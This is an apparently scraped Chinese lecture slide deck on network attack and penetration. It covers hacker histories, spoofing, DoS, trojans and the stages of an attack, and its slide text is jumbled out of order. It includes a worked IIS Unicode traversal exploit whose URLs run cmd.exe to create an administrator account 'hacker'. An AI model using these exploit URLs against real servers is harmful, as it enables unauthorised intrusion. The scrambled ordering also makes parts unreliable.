当前位置:文档之家› 第二章(网络安全漏洞分析与渗透)

第二章(网络安全漏洞分析与渗透)


电话欺骗 ` 攻击者经常利用人们缺乏安 全意识,通过电话询问密码, 从而轻而易举得获得进入系 统的“合法钥匙”
7
E-mail 欺骗 ` 使用Telnet一个黑客可以截取任何
一个身份证,发送Email给一个用户 ` 这样的Email消息是真的,因为它发
自于一个合法的用户
Web 欺骗 `例如,在访问网上银行时,用户可以根据所见 的银行Web页面,从该行的帐户中提取或存入一 定数量的存款
及芬兰NOKIA公司的电脑系统,盗走各种程序和数据(价4 亿美金)。 ` 下村勉用“电子隐形化”技术跟踪,最后准确地从无线电 话中找到行迹,并抄获其住处电脑
` 1995年2月被送上法庭,“到底还是输了”。 ` 2000/2003年1月出狱,3年内被禁止使用电脑、手
机及互联网
2
` 1965年生,父为贝尔实验室计算机安全专家。 ` 从小对电脑兴趣,有自己账号。 ` 初中时(16岁)发现UNIX漏洞,获取实验室超级口令并提
12
` 特洛伊木马的传说 传说希腊人围攻特洛伊城,久久不能得手。后来想出 了一个木马计,让士兵藏匿于巨大的木马中。大部队 假装撤退而将木马摈弃于特洛伊城,让敌人将其作为 战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜 利、放松警惕的时候从木马中爬出来,与城外的部队 里应外合而攻下了特洛伊城
` 攻击原理
` 局域网采用广播方式,因此,若在某个广播域 中可以侦听到所有的信息包,攻击者就可以对信 息包进行分析,那么该广播域的信息传递都会暴 露在攻击者面前 ` 路由器、虚拟局域网(VLAN)、防火墙是当前主 要的网络分段手段
4
` 踩点及其对策 ` 扫描技术 ` 嗅探技术及其对策 ` 拒绝服务攻击 ` 获取访问权限攻击 ` 特权提升攻击 ` 消除痕迹技术 ` 后门技术
` 信息收集
信息收集技术是一把双刃剑 黑客在攻击之前需要收集信息,才能实施有效的攻击 安全管理员用信息收集技术来发现系统的弱点并进行修补 收集信息的同时也暴露了攻击者自己
17
` 利 用 流 光 扫 描 web 服 务 器 , 查 看 其 是 否 有 Unicode漏洞。如下面的扫描结果,就显示此服 务器有Unicode 漏洞
` / script/..%c1%1c../..%c1%1c../..%c1%1c../ winnt/system32/cmd.exe?/c+dir%20c:\ (HTTP: 200 )
随意更改用户的电话号码。并与中央联邦调查局的特 工恶作剧。 ` 被电脑信息跟踪机发现第一次被逮捕
1
` 出狱后,又连续非法修改多家公司电脑的财务帐单。1988 年再次入狱,被判一年徒刑。
` 1993年(29岁)逃脱联邦调查局圈套。 ` 1994年向圣地亚哥超级计算机中心发动攻击,该中心安全
专家下村勉决心将其捉拿归案。 ` 期间米特尼克还入侵了美国摩托罗拉、NOVELL、SUN公司
`后门与缓冲区溢出
目前最流行的一种BUG类攻击就是缓冲区溢出 当目标操作系统收到了超过它所能接收到的信息量时
发生缓冲区溢出
9
` 举例:冰河软件
冰河是一个国产木马程序,具有简单的中文使用界面 只有少数流行的反病毒、防火墙才能查出冰河的存在
` 什么是拒绝服务攻击(DoS)
拒绝服务攻击(DoS)的英文全称是Denial of Service,也就是“拒绝服务”的意思
` 通过以上3步,建立一个administrator用户,hacker, 密码是1234
` 然后通过以下方式运行hack.bat文件 ` http://192.168.0.136/scripts/..%c1%1c../winnt/sys
tem32/cmd”.exe?/c+c:\inetpub\scripts\hack.bat ` 选择打开,则在服务器上添加了一个administrator用
` “头号电脑黑客” Kevin Mitnick ` 1964年出生。3岁父母离异,致性格内向、沉默寡言。
4岁玩游戏达到专家水平。 ` 13岁喜欢上无线电活动,开始与世界各地爱好者联络。
编写的电脑程序简洁实用、倾倒教师。 ` 15岁闯入“北美空中防务指挥系统”主机,翻阅了美
国所有的核弹头资料、令大人不可置信。 ` 不久破译了美国“太平洋电话公司”某地的客户密码,
¾一般说来,有魅力的异性通常是最可怕的信 任欺骗者,不过不论对于男性还是女性,女 性总是更容易令人信任
` 前门攻击 ` 后门攻击
8
` 前门攻击介绍 在一个前门攻击中一个黑客伪装成一个合法的用户进入系 统,因为一个黑客拥有一个合法用户的所有信息,他(她) 就能够很简单地从系统的“前门”正当地进入
` 暴力攻击 暴力攻击类似于前门攻击,两者的区别是在暴力攻击中一 个黑客猜解所有的他认为能够击败认证和获得一个合法用 户密码的字母、单词、字符
`从扫描报告中得知管理员的用户名为administrator,密码为空 `利用侦测到的被攻击服务器的管理员用户名和密码 `利用DOS命令登录被攻击服务器
16
登录被攻击的服务器
` 映射被攻击的服务器磁盘
` 建立与被攻击服务器相关磁盘卷的映射关系后, 在自己的机器上可以看到服务器C盘的映射到H盘。 此时已经达到了成功入侵
` 黑客们喜欢攻击的目标包括
路由器 信息数据库 Web服务器 FTP服务器 其它一些与协议相关的服务
6
资源类型
服务器资源
网络资源
资源
HTTP服务器 FTP服务器 SMTP服务器 帐号数据库 信息数据库 路由器 交换机 防火墙 主机
` 电话欺骗 ` E-mail欺骗 ` Web欺骗
攻击者要通过木马攻击你的系统,他所做的 第一步是要把木马的服务器端程序植入到你 的电脑里面
` 入侵途径 通过一定的方法把木马执行文件弄到被攻击者的电脑系统 里,如邮件、下载等 一般的木马执行文件非常小,大都是几K到几十K,因此若 把木马捆绑到其它正常文件上,用户是很难发现的 木马也可以通过Script、ActiveX及Asp、CGI交互脚本的 方式植入
户,hacker,密码是1234
18
扫描出特定网段的活动IP 扫描出主机的开放端口 得到主机的共享信息
19
` 个人可以从多方面保护主机,避免受到攻击
` 物理安全的目的是保护工作站、各种网络服务器、 打印机等硬件实体和通信链路免受自然灾害、人 为破坏和搭线窃听攻击
` 确保网络设备有一个良好的电磁兼容工作环境 ` 妥善保管备份磁带和文档资料 ` 防止非法人员进入机房进行破坏活动
选择 会用
的 方式 入侵
获取 系统 一定 权限
升 为 最 高 权
安装 系统 后门

其获 他取 攻或敏 击者感 目信 的息
判断 系统

选择
获取

端口 判断
最简
系统

方式
一定

入侵
权限


分析

可能
有漏
洞的
服务
攻击其 他系统
安装 多个 系统 后门
清除 入侵 脚印
获取敏 感信息
作为其 他用途
` 信息收集 ` 试探、寻找突破口 ` 实施攻击 ` 消除记录 ` 保留访问权限
醒其父。 ` 可以一连几个小时潜心阅读2000/2003多页的UNIX手册,
是学校里最精通UNIX的人。学校为他设专线。 ` 1988年成为康奈尔大学研究生,获“孤独的才华横溢的程
序专家”称号。
` 1988年10月试图编写一个无害病毒,要尽可能感 染开。11月2日病毒开始扩散,但一台台机器陷 入瘫痪!10%互联网上的主机受影响,莫里斯受 到控告,被判3年缓刑、1万元罚金和400小时的 社区服务,也停顿了康奈尔大学的学习。
` 扫描报告中若有这样的句子,则可以通过下面一 系列操作在对方主机创建一个有管理员权限的用 户
http://192.168.0.136/scripts/..%c0%af../winnt/sy stem32/cmd".exe?/c+echo+net+user+hacker+1234+/ad d+> c:\inetpub\scripts\hack.bat
确认信息(ACK)
服务器
SYN-flood攻击示意图
被攻击的主机
实施攻击的主机
11
Smurf攻击示意图
ICMP响应包
中间主机
虚假IP包
ICMP响应包
虚假IP包
被攻击的主机 ICMP响应包
中间主机
黑客 虚假IP包
中间主机
DDoS(Distributed Denial of Service)介绍
` 举例-字典攻击 —个字典攻击通过仅仅使用某种具体的密码来缩小尝试的 范围 管理员密码规律
` 后门攻击介绍
后门是指入侵者躲过日志,使自己重返被入侵系统的 技术
` 后门攻击种类
调试后门、管理后门、恶意后门、Login后门、Telnet 后门、rhosts +后门、服务后门、文件系统后门、内 核后门、Boot后门、TCP Shell后门等
` 典型的攻击方式
◦ 电子欺骗方式 ◦ 前门攻击和后门攻击 ◦ 拒绝服务攻击 ◦ 木马攻击
5
` 黑客在实施攻击时,往往不会只用单一的技术, 而是把一些攻击结合起来使用 ` 对于广大PC机用户防范黑客的重要手段之一就 是安装个人版防火墙
`任何以干扰、破坏网络系统为目的的非授权行为都 称之为网络攻击 `入侵者对网络发起攻击是多种的
高 入侵者水平
攻击手法
半开放隐蔽扫描 工具
包欺骗 嗅探 擦除痕迹
拒绝服务
DDOS 攻击
www 攻击
自动探测扫描
相关主题